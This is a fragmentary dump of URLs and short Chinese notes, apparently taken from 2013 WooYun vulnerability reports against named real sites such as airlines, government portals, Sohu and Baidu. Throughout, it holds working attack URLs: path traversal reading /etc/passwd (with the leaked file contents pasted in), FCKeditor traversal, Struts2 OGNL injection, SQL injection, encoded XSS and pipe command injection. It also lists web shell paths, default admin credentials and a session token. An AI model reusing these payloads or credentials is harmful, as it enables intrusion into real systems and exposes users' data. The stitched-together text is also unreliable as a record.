http://olcs2.csair.com/iframe_logo.php?arg=csair&style_id=103608619&is_zdylogo=1&style_hangye_id=0&logo_lock=0&proxy=&company_id=70722519&gggj_logo=0&key=1&ykey=1&is_yx=Y http://olcs2.csair.com/iframe_logo.php?arg=csair&style_id=103608619&is_zdylogo=1&style_hangye_id=0&logo_lock=0&proxy=&company_id=70722519&gggj_logo=0&key=1&ykey=1&is_yx=Y www.investsc.cn http://www.investsc.cn/web/fair!ztIndex.action http://rf.shenzhenair.com/ http://open.t.sohu.com/index.jsp http://open.t.sohu.com/apps/validateApply?app_id=13585&dt=1381812271343 http://open.t.sohu.com/apps/editappstat?app_id=13585&status=1 http://qudaobbs.ganji.com/uc_server/admin.php www.shenzhenair.com找回密码时有如下链接: http://www.shenzhenair.com/regist/userMgr.do?operate=mailYz&ux=138206xxxx,重置密码时只判断ux值(重置链接2小时内有效)。测试时用两个账号分别发送找回密码请求,发现ux=138206xxxx后四位数字不一样。 http://www.shenzhenair.com/regist/userMgr.do?operate=mailYz&ux=1382066765 www.169ol.com http://jxt.169ol.com:8080/mschool/selectLoginUser.action http://wqt.169ol.com/map.action;jsessionid=C763EA11A309BB0F0574AF0F1BCD6377 http://hwtrip.smartcom.cc/user.php?act=resetPSW&email=xxxx@sina.com&ck=fada81749**********6e63c7c0c8&uid=123456789 www.vmall.com http://www.vmall.com/member/account/sendEmail.json http://tmc.95080.com/business-travel/forgetPwAction!getPassword.action http://game.wo.com.cn/information.jsp?type=1 http://ceagent.ceair.com/ http://ceagent.ceair.com/ceagent/front/file/file-download!downloadFromServer.shtml?inputPath=/etc/passwd http://ceagent.ceair.com/ceagent/front/file/file-download!downloadFromServer.shtml?inputPath=/etc/sysctl.conf http://ceagent.ceair.com/ceagent/front/file/file-download!downloadFromServer.shtml?inputPath=/etc/group root:x:0:root bin:x:1:root,bin,daemon daemon:x:2:root,bin,daemon sys:x:3:root,bin,adm adm:x:4:root,adm,daemon tty:x:5 disk:x:6:root lp:x:7:daemon,lp mem:x:8 kmem:x:9 wheel:x:10:root mail:x:12:mail news:x:13:news uucp:x:14:uucp man:x:15 games:x:20 gopher:x:30 dip:x:40 ftp:x:50 lock:x:54 nobody:x:99 users:x:100 nscd:x:28 floppy:x:19 vcsa:x:69 pcap:x:77 utmp:x:22 utempter:x:35 slocate:x:21 rpc:x:32 mailnull:x:47 smmsp:x:51 rpcuser:x:29 nfsnobody:x:4294967294 sshd:x:74 dbus:x:81 haldaemon:x:68 avahi-autoipd:x:101 avahi:x:70 apache:x:48 ntp:x:38 xfs:x:43 gdm:x:42 sabayon:x:86 stapdev:x:102 stapusr:x:103 hw:x:500 was:x:403:was7 wl:x:105 ot:x:201 os:x:203 bk:x:205 rd:x:206 et:x:207 cs:x:208 ap:x:209 nw:x:211 tux:x:401 mqm:x:402 uni:x:111 rduser:x:501 op:x:212 td:x:213 jboss:x:214 hexuan:x:12071 lixue:x:10053 zhangjin:x:12076 http://ceagent.ceair.com/ceagent/front/file/file-download!downloadFromServer.shtml?inputPath=/etc/sysconfig/network-scripts/ifcfg-eth0 http://brandbase.mama.cn/wyeth.php?mod=pregnant&fid=23#fid23 http://cmdp.ncc.cma.gov.cn/Website/index.php?ChannelID=22 http://www.cmp.cma.gov.cn/mall/talk.asp?prodid=3181 http://www.csc100.com/news/content.php?id=663 http://www.kerqin.gov.cn/rhxx.txt http://www.chengdu.gov.cn/uploadfiles/301201/201111410135.txt http://lbj.maoming.gov.cn/files/%E6%89%B6%E8%B4%AB%E6%8B%9B%E7%94%9F%E5%85%AC%E7%A4%BA.txt www.shxda.gov.cn http://www.edugd.cn/web/46/xw/1/46_11872/%E7%AC%AC%E4%BA%8C%E6%89%B9%E6%95%B0%E6%8D%AE%E9%97%AE%E9%A2%98_20080311.TXT http://ffp.shenzhenair.com/ffp/ http://ffp.shenzhenair.com/ffp/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=/../ http://ffp.shenzhenair.com/ffp/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../../../../../../../../../../../ http://ffp.shenzhenair.com/ffp/.svn/entries http://ffp.shenzhenair.com/ffp/CVS/Entries http://ffp.shenzhenair.com/ffp/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://ffp.shenzhenair.com/ffp/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector http://ffp.shenzhenair.com/ffp/UserFiles/all/wooyun.txt http://ffp.shenzhenair.com/ffp/UserFiles/all/jspshell.jsp会跳转到http://ffp.shenzhenair.com/ffp/timeout.shtml?url=/UserFiles/all/jspshell.jsp http://hwtrip.smartcom.cc/user/ucenter.html?is_ajax=1&act=changeOrderStatus&id=13207&changeto=8&page=1&pageCount=1 http://hwtrip.smartcom.cc/book.php?bookAct=pay&orderSN=1310181xxxx http://www.nanshan.edu.cn/ks/doc_down/zxkskmylb/30%E6%97%A5%E5%89%8D%E4%BA%A4%E5%8D%A1%E6%8A%A5%E5%90%8D%E6%A0%B8%E5%AF%B9%E6%80%BB.txt http://game.open.uc.cn/ http://calt-czxy.com/ http://202.103.49.226/test.txt http://hr.shanghai-air.com/admin/login.jsp http://sus.lenovomm.com/adpportal/index.htm http://202.99.81.51/test.txt http://pay.game.pps.tv//gamepay/game_pay_main/index?tid=5601&server_type=0&g_id=341 http://jjsg.hupu.com/newusercard/getCardType?t=4&jsoncallback=jsonp1381930329833&g=82 http://brandbase.mama.cn http://www.mama.cn/q/ http://www.b-link.net.cn/index.php/news?cid=274 http://f2.warlord.duowan.cn/ http://dg.qefeng.com/index.php/Index/noticecon/id/21 http://travel.qunar.com/plan/list/city/300079/?bookId=2558883 http://tv.tom.com/App_User_Zzjpage.php?zj_id=zj273 http://bbs.appchina.com/.svn/entries http://igame.xiaomi.com/home.php?mod=space&uid=118857&do=blog&id=3 http://de.appchina.com/ http://zabbix.sa.snyu.com/ http://fwzx.cnta.gov.cn/xxflt.asp?t_id=20 http://fwzx.cnta.gov.cn/ZW.asp?n_id=1748 http://fwzx.cnta.gov.cn/yjjy-FB2.asp?t_id=8 http://my.fm.tom.com/FMApis/androidMyLib.action filetype:xls http://219.140.192.165/ http://doer.lenovo.com.cn/ filetype:xls http://114.255.93.220 http://agents.shandongair.com.cn/ http://www.dxnma.com/login.do http://118.180.8.48/cdyx/hipster/hipster-index.do http://202.100.80.48:8888/login.do http://www.ctnma.cn/login.do http://plschool.gs.bnet.cn/web.rar http://doer.lenovo.com.cn/ http://jz.1688.com/ http://www.baidu.com/link?url=-GzGqGE0xGc6iJNYun7uTdxmrEwUnlwNRRfSO-aHMiy http://www.baidu.com/./link?url=-GzGqGE0xGc6iJNYun7uTdxmrEwUnlwNRRfSO-aHMiy http://www.baidu.com/link?url=-GzGqGE0xGc6iJNYun7uTdxmrEwUnlwNRRfSO-aHMiy的效果一样 http://intranet.tomonline-inc.com/upload/tomonline-inc.xls http://intranet.tomonline-inc.com/.svn/entries http://intranet.tomonline-inc.com/login/.svn/entries http://intranet.tomonline-inc.com/test.php http://pay.5see.com/getgameServers.aspx?game= http://121.14.4.144:8080/ http://finance.tomonline-inc.com/.svn/entries http://www.hgtech365.com/action/news/news_detail.php?url=56 http://www.elinkhost.com/confirm/ www.line0.com https://218.24.192.60:8443/login.action https://119.48.248.6:8443/license.action http://newbidding.sgcc.com.cn http://newbidding.sgcc.com.cn/jsp/indexIncludJsps/secondPage/newsListServlet?countPerPage=10&newsType=wzmore&pageNo=3&pstatuts=1 http://www.dnt.com.cn/en/business.php?id=88 http://219.141.222.104/ http://e.vmall.com/common/ajaxtrouble/11/user http://www.pahnw.cn/admin/manage_admin.asp?id=147&action=delete http://123.126.33.235 http://123.126.33.235/api/homepage/getItemList?categoryId=4&subCategoryId=0&areaId=0&showTime=0&start=0&pageSize=10 http://123.126.33.235/thirdparty/view/homepage.action http://www.goldmail.cn/service/news_detail.php?ID=109 http://www.goldmail.cn/service/news_detail.php?ID=109 http://222.247.56.84/ http://222.247.56.84/p.rar http://222.240.168.145/PRTVUWeb/pages/status/querystudentinfo.jsp http://121.28.150.76/PRTVUWeb/pages/status/querystudentinfo.jsp http://219.142.50.49/PRTVUWeb/pages/status/querystudentinfo.jsp http://218.57.132.198/PRTVUWeb/pages/status/querystudentinfo.jsp http://125.72.41.102/PRTVUWeb/pages/status/querystudentinfo.jsp http://118.122.124.82:8000/PRTVUWeb/pages/status/querystudentinfo.jsp http://218.22.21.234/PRTVUWeb/pages/status/querystudentinfo.jsp http://210.38.32.181/PRTVUWeb/pages/status/querystudentinfo.jsp http://202.121.87.193/PRTVUWeb/pages/status/querystudentinfo.jsp http://220.174.236.26/PRTVUWeb/pages/status/querystudentinfo.jsp http://202.111.181.167/PRTVUWeb/pages/status/querystudentinfo.jsp http://61.186.170.115/PRTVUWeb/pages/status/querystudentinfo.jsp http://info.hngs.net/viewinfo.mpl?id=9042 http://e.vmall.com/login/forgetpwd,如下图所示,在找回密码的第一步填写帐号A的帐户名: http://www.zdfap.zj.sgcc.com.cn/ams/POM/contract/login.jsp http://www.zdfap.zj.sgcc.com.cn/ams/struts/ams/webPageInfo.do root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin distcache:x:94:94:Distcache:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin hsqldb:x:96:96::/var/lib/hsqldb:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:102:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin wls92:x:500:500::/home/wls92:/bin/bash tomcat:x:501:501::/home/tomcat:/bin/bash ams:x:503:503::/home/ams:/bin/bash smsws:x:504:505::/home/smsws:/bin/bash oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin http://219.147.134.27:8083/ekbs/ask/systemManageIndex.action?method=toSystemManageIndex http://219.148.7.9:8082/ekbs/ask/systemManageIndex.action?method=toSystemManageIndex http://zhishiku.yc.nx.cn:8083/ekbs/ask/systemManageIndex.action?method=toSystemManageIndex http://219.141.157.213/ekbs/ask/systemManageIndex.action?method=toSystemManageIndex http://www.suning.com.cn http://www.suning.com.cn/FeedBack.aspx?CID=8&RID=19&BID=999 http://www.beyond.cn/ http://61.183.175.36/wf/company/ToCompanyRegister.action http://baike.meadin.com/edit/create.asp http://www.china-cet.com/neirong_wangzhan.php?id=10808 http://www.china-cet.com/denglu.php http://www.ccgp-hubei.gov.cn/indexAction!index.action http://lvyou.baidu.com post:http://t.sohu.com/twAction/insertTwitter http://s2.t.itc.cn/mblog/pic/201310_20_20/s_a08smq4715831178488.jpg\x22\x20\x6f\x6e\x6c\x6f\x61\x64\x3d\x61\x6c\x65\x72\x74\x28\x31\x29\x2f\x2f.jpg","extraData":{"smallest":{"w":120 http://www.ihaier.com/haier-rsp-portlet/download.jsp?path=/../../../../../../../../../etc/passwd&name=%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%65%74%63%2F%70%61%73%73%77%64 http://www.wsgjp.com.cn/Charge/CheckCompanyName.ashx http://bbs.mygjp.com/web/forum_search.aspx?text=1 http://www.wsgjp.com.cn/Charge/CheckCompanyName.ashx http://www.wsgjp.com.cn/Charge/CheckCompanyName.ashx http://www.wsgjp.com.cn/Charge/CheckCompanyName.ashx http://www.wsgjp.com.cn/Charge/CheckCompanyName.ashx http://218.106.129.33:8080 http://218.106.129.33:8080/zecmd/zecmd.jsp http://218.106.129.33:8080/iesvc/iesvc.jsp url:http://dc.dopool.com/wp-login.php magicbox:/pentest/web/wpscan# http://dc.dopool.com http://i.sohu.com/a/app/mblog/save.htm?_input_encode=UTF-8 http://buy.111.com.cn/cart/shoppingcart/queryshoppingcart.action http://www.111.com.cn/list/list.action http://passport.111.com.cn/sso/login.action http://www.mogujie.com/trade/address http://www.mogujie.com/trade/address/getaddr4order?addressId=920174 http://www.rgrcb.com/readme.txt http://www.rgrcb.com/manage/Manage_Index.php http://218.106.129.38/V2Conf/jsp/main/mainAction.do http://218.106.129.39/V2Conf/jsp/main/mainAction.do http://218.94.1.173/Legalaid_SFB/Login.aspx http://contract.kappa.com.cn/ http://contract.kappa.com.cn/Admin/UserPrevelige.aspx http://contract.kappa.com.cn/Admin/CusAdviceDetails.aspx?M_id=1 http://cac.midea.com/mideacac/login.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://123.126.33.181 http://hgcg.customs.gov.cn/hgcg/default.aspx https://hgcg.customs.gov.cn/hgcghy/Pages/HYHomeIN/index.aspx?x=1 http://job.shenzhenair.com https://219.141.222.1/GWREGISTER/UserRegisterChildAccount.action http://123.126.33.209/admin/permission/weblogin.php http://123.126.33.209/admin/tools/checkPlist/delPlistByPid.php?pidStr=1 http://123.126.33.209/admin/tools/checkPlist/delPlistByPid.php?pidStr=1 http://123.126.33.209/admin/tools/checkPlist/delPlistByPid.php?pidStr=1%20and%201=1 http://202.100.80.31/cgi-bin/web2cgi/get_att.cgi?up_attach=|cat%20/quark/etc/mysql.conf http://bbs.ce.cn/bbs/govweb/govweb_sec.php?t=1&id=33 http://www.bjmama.com http://1.com\u0022\u003e\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u002f\u006f\u006e\u006c\u006f\u0061\u0064\u003d\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029\u003e/1.swf http://www.wooyun.org/bugs/wooyun-2013-040255/trace/d350ac8b712e4e10258d424c37f05637 http://www.wooyun.org/bugs/wooyun-2013-040254/trace/3be6cf3dd8b70a0f69236aef945a12dc http://www.wooyun.org/bugs/wooyun-2013-040250/trace/673b31671413cd024f256bef07983861 http://www.wooyun.org/bugs/wooyun-2013-040248/trace/ea2705562bc28f088d14ffc598e60c7a http://www.wooyun.org/bugs/wooyun-2013-040244/trace/c724e7a3ecef3ebebd8a61a4e7799042 http://robot.dangdang.com/WebIm/page/officialPortal.jsp http://www.wadj.gov.cn/asp/searchinfo.asp?ch_btnReset=%D6%D8+%D6%C3&ch_Type=1&ch_btnSearch=%CB%D1+%CB%F7&ch_Item= www.hkcts.com/ www.hkcts.com/CMS/job/resume.action?post.id=99‎ http://metroparkhotels.com/group_packages.php?session=2 http://www.clcn.net.cn/modules/downloads/index.php?cat_id=1 http://s.haier.com http://admin.sys.www.dianping.com/Admin_FeedBack/DP_Admin_BrowseEmail.aspx?FeedID=2781097 http://admin.sys.www.dianping.com/Admin_FeedBack/DP_Admin_BrowseEmail.aspx?FeedID=2781097 http://115.239.131.74/index.php http://www.jycin.gov.cn/FileTransferUpload/ http://115.239.130.14/login.html、http://115.239.130.12/login.html、http://115.239.130.13/、http://115.239.130.76/等等,这个段好多的。 http://www.hkctshotels.com http://hkctshotels.com/news.aspx?type=News http://hkctshotels.com/brandlist.aspx?GID=GM http://www.hkctshotels.com/brandlist.aspx?GID=GM http://www.gzmzw.gov.cn/printpage.asp?ArticleID=713,利用SQL注入可获取该网站的数据库信息,利用获取的用户名和密码登陆后台,可执行添加管理员及修改网站信息操作。 http://www.songshancn.com http://www.songshancn.com/CMS/news/search.action http://pcm.welling.com.cn:7001/ http://pcm.welling.com.cn:7001/web/plug-in/dl.jsp?fileName=item_cost_and_fee.doc&filePath=../../../../../../../../../../etc/passwd%00.doc root:x:0:0:Super-User:/:/sbin/sh daemon:x:1:1::/ bin:x:2:2::/usr/bin sys:x:3:3::/ adm:x:4:4:Admin:/var/adm lp:x:71:8:Line Admin:/usr/spool/lp uucp:x:5:5:uucp Admin:/usr/lib/uucp nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico smmsp:x:25:25:SendMail listen:x:37:4:Network Admin:/usr/net/nls gdm:x:50:50:GDM webservd:x:80:80:WebServer postgres:x:90:90:PostgreSQL UID:/:/usr/bin/pfksh svctag:x:95:12:Service nobody:x:60001:60001:NFS noaccess:x:60002:60002:No nobody4:x:65534:65534:SunOS weblogic:x:1009:888::/app:/bin/sh http://pcm.welling.com.cn:7001/b2b/ http://pcm.welling.com.cn:7001/web/images/ http://www.shmama.net/forum.php inurl:admin_add.asp http://t.163.com/rank/daren http://t.163.com/user/batchAddFocus?screenNames=hhan http://163.fm/XqkSZg6 http://www.whep.gov.cn/admin http://www.szmama.com/ http://1.com\u0022\u003e\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u002f\u006f\u006e\u006c\u006f\u0061\u0064\u003d\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029\u003e/1.swf http://neibu.nies.net.cn/ZeeWJ.asp http://e.vmall.com/ http://wx.233.com/search/school/Courseaware/jy.asp?DCourseID=17773 http://s.233.com/search/zhuanti/ksnewslist.asp?id= http://bbs.233.com/hack.php?H_name=qiandao&qdorder=totaldays http://s.233.com/search/comment/?NewsID=1322814432590740&Domain=zq http://s.233.com/search/comment/?NewsID=1322814432590740&Domain=zq http://s.233.com/search/comment/?NewsID=1322814432590740&Domain=zq http://s.233.com/search/comment/?NewsID=1322814432590740&Domain=zq http://hi.haidilao.com/pages/creative/creative_list.jsp http://zsall.mobilem.360.cn/wallpaper/search?start=0&num=99&kw= http://i.sohu.com/a/app/mblog/save.htm?_input_encode=UTF-8 http://tv.sohu.com/20131020/n388535118.shtml# data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg== http://www.ahtlxgt.gov.cn/admin/ http://www.cae.com.cn/webFunction/webpagenews.aspx?nid=1f2d56a1703d487ebbdebab3c0b912f4 http://franchising.mcdonalds.com.cn/cn/faq.aspx?cid=5 http://www.vapee.com/new_vapee/index.php?d=anonymity&c=gbook_c_recep&m=index&z_cate=1&class=1 http://cartoon.jm.gd.vnet.cn/ http://game.funshion.com http://game.funshion.com:80/ http://www.tuanxila.com/pro-cate.html?keyword=m1x7e1 http://pandavip.www.net.cn/cgi-bin/query_second?price1=0&price2=0&tld_type=&com_type=&length1=0&length2=0&key_name=m1x7e1 http://yangtian.wm-it.com/test/ username:admin password:123456 http://it.homeinns.com/ito_beta/Main/main.aspx http://it.homeinns.com/ito_beta/Event/UserInfo.aspx http://pim.lenovo.com/ http://pim.lenovo.com/contact/contact/portal/query/contact/contactId/7?t=1382111729847 http://mail.nbzj.gov.cn/ http://ggfw.jshrss.gov.cn/PostDoctoral/external/comIndex.action?id=C000006 http://edu.91.com/bbs/robots.txt/a.php http://bbs.91up.com/robots.txt/a.php http://bbs.conquista.91.com/clientscript/vbulletin_important.css/a.php http://mjoy.91.com/imgs/css/css.css/a.php http://tieba.baidu.com/home/main?un=%E5%AE%89%E8%BF%AA%E5%93%A5%E5%93%A5%E6%97%A0%E6%95%8C%E5%B8%85&fr=pb URL:http://tieba.baidu.com/home/post/follow ie:utf-8 tbs:1190f2082bac96ec1382418842 http://www.tophr.net/InterView/news.asp?id=215 http://121.207.254.4/myadmin/index.php?lang=en-iso-8859-1&server=1 http://so.91.com/resin-doc/tutorial/jndi-appconfig/test?inputFile=file:////etc/sysconfig/network-scripts/ifcfg-eth0 file:////etc/sysconfig/network-scripts/ifcfg-eth0 root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin distcache:x:94:94:Distcache:/:/sbin/nologin ais:x:39:39:openais Framework:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin ldap:x:55:55:LDAP User:/var/lib/ldap:/bin/false vcsa:x:69:69:virtual owner:/dev:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin fax:x:78:78:mgetty user:/var/spool/fax:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin cyrus:x:76:12:Cyrus Server:/var/lib/imap:/bin/bash ntp:x:38:38::/etc/ntp:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin amanda:x:33:6:Amanda user:/var/lib/amanda:/bin/bash postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin radiusd:x:95:95:radiusd user:/:/bin/false exim:x:93:93::/var/spool/exim:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin pvm:x:24:24::/usr/share/pvm3:/bin/bash mailman:x:41:41:GNU Manager:/usr/lib/mailman:/sbin/nologin quagga:x:92:92:Quagga suite:/var/run/quagga:/sbin/nologin dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin privoxy:x:73:73::/etc/privoxy:/sbin/nologin radvd:x:75:75:radvd user:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin ident:x:98:98::/home/ident:/sbin/nologin pegasus:x:66:65:tog-pegasus services:/var/lib/Pegasus:/sbin/nologin tomcat:x:91:91:Tomcat:/usr/share/tomcat5:/bin/sh xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin jf91:x:500:500::/home/httpd/html/:/sbin/nologin wlin:x:501:501::/home/httpd/html/test:/sbin/nologin mongodb:x:20001:20001::/home/mongodb:/bin/bash sody:x:20002:20002::/home/httpd/html/so.dy.com.cn:/bin/bash so91:x:20003:20003::/home/httpd/html/so.91.com:/sbin/nologin www.iotmoe.cn www.iotr.org.cn www.iotedu.com.cn www.nrit.cn www.zgyjw.org.cn www.ccit.org.cn http://www.ccit.org.cn/eWebwanEditorbo/admin/ www.btvb.tv http://btvb.tv/eWebwanEditorbo/admin/ http://trips.feihang.cn/tripslist.aspx?id=5 http://trips.feihang.cn/trips.aspx?id=248 http://hotel.feihang.cn/hotellist.aspx?cID=363 http://hotel.feihang.cn/hotellist.aspx?ID=82 http://hotel.feihang.cn/HotelOrder.aspx?ID=286 http://hotel.feihang.cn/HotelOrder.aspx?ID=286&MID=181 http://trips.feihang.cn/tripslist.aspx?id=5 http://trips.feihang.cn/tripslist.aspx?id=5 http://trips.feihang.cn/tripslist.aspx?id=5 www.zsmyy.com/plus/Ajaxs.asp?action=GetRelativeItem&Key=123%2525%2527%2529%2520%2575%256E%2569%256F%256E%2520%2573%2565%256C%2565%2563%2574%25201,2,username%252B%2527%257C%2527%252Bpassword%20from%20KS_Admin%2500 http://c.tieba.baidu.com//c/s/sync?msg_status=1&net_type=3&ka=open&_phone_imei=E7F9E1BD6557D6D1F4EC1365A3FA2F77&manager_model=0&_timestamp=1382417734256&BDUSS=1p2dkUtRUR4enNFQ2pBUnoyRHZPNGlWNlNjRW5FTTcwbk9rRnlHRzF2OUxiNHRTQVFBQUFBJCQAAAAAAAAAAAEAAAAT~JQ5usPJ2cTqueLDosvEyeQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEviY1JL4mNSM|f4a94c2b213eb3b68362a95c708d98f5&_client_version=4.5.33277d%3Cimg%20src%3da%20onerror%3dalert%28%2708sec%27%29%3E034ecb35ff8138911&_phone_newimei=E7F9E1BD6557D6D1F4EC1365A3FA2F77&_phone_screen=640%2C960&from=appstore&_client_type=1&_client_id=wappc_1382283759950_558&_os_version=7.0.2&cuid=E7F9E1BD6557D6D1F4EC1365A3FA2F77&sign=5FE0C1D66999A8D9FE6FBC54572D0C28 http://www.qinglanji.com/index.php?app=group&ac=topic&ts=delete&id=885&userid=295262 http://tieba.baidu.com/pmc/bawu http://25555555.com/menpiao/menpiao/MenPiaoYuDing.aspx?MID=116 http://25555555.com/menpiao/menpiao/MenPiaoYuDing.aspx?MID=116 http://25555555.com/menpiao/menpiao/MenPiaoYuDing.aspx?MID=116 http://25555555.com/menpiao/menpiao/MenPiaoYuDing.aspx?MID=116 http://www.qy6.com/common/feedback.php http://xzxk.justice.gov.cn/application/stateList.action?appType=XZXK4_APP_TYPE_5 http://222.77.183.235/video/ user:fzadmin password:123456 http://222.77.183.235/video/ http://blog.mingdao.com/ www.oxford.com.cn www.zhongjianye.com博主 www.weibo.com/blhe http://love.51kuban.com/index.php/default/index http://houtai.kuai8.com/emb/find_psw.php http://yzddpk.jstv.com/qdgl/ http://xxxx http://member.china-pub.com/member/mypub/account_infrom.aspx http://221.181.12.4/mainFrame.rw http://bbs.douwan.cn/robots.txt/1.php http://bbs.cmge.com/test.html。 http://blog.sohu.com/manage/entry.do http://202.108.211.92/home/abstract/index https://st.ettoday.net/shop/shop-category.php?shop=45-175 http://waibao.sogou-inc.com/import.jsp http://waibao.sogou-inc.com/DownloadAction http://training.soufun.com/course/course.aspx?lid=-1 view-source:http://hms.qunar.com/admin/directsell/hotelimage/index.htm?navid=123456 data:text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4= https://bb.tower.im/users/sign_in http://121.14.4.186/views/mail/script/mail.jsp http://59.57.250.58:8090/ http://122.227.140.114/ http://211.152.60.227:8011/API/getresv.aspx?service=get_resv_info&partner=ben4a8ysd&orderid=130512021002010 http://www.fjhi.gov.cn/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector http://www.fjhi.gov.cn/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFolders&Type=Media&CurrentFolder=/ http://www.fjhi.gov.cn/zb http://www.fjhi.gov.cn/zxpx/ http://www.tjjnwsjds.com/manage/manage_login.action http://www.ewebtd.com/ http://211.138.112.80:8080/dbs/DisplayServlet?ftable=software&lid=130500%2b1 http://x.xdf.cn/home.php?mod=spacecp&ac=friend&op=find data:text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4= URL:www.mz10010.com filetype:xls http://202.99.63.185:8081/YearBook http://ts02.12634.com/Home/Login http://m.anquanbao.com/a.php http://m.anquanbao.com/m.php http://blog.jiankongbao.com/wp-login.php http://www.whepb.gov.cn/install/ https://pr.sohu-inc.com/.svn/entries http://gz12315.com.cn/reg.do?method=getUser1&FUserCode=%20WLOVEDYN http://www.letvcloud.com/api/sdkdownload?c=php&v=1.2 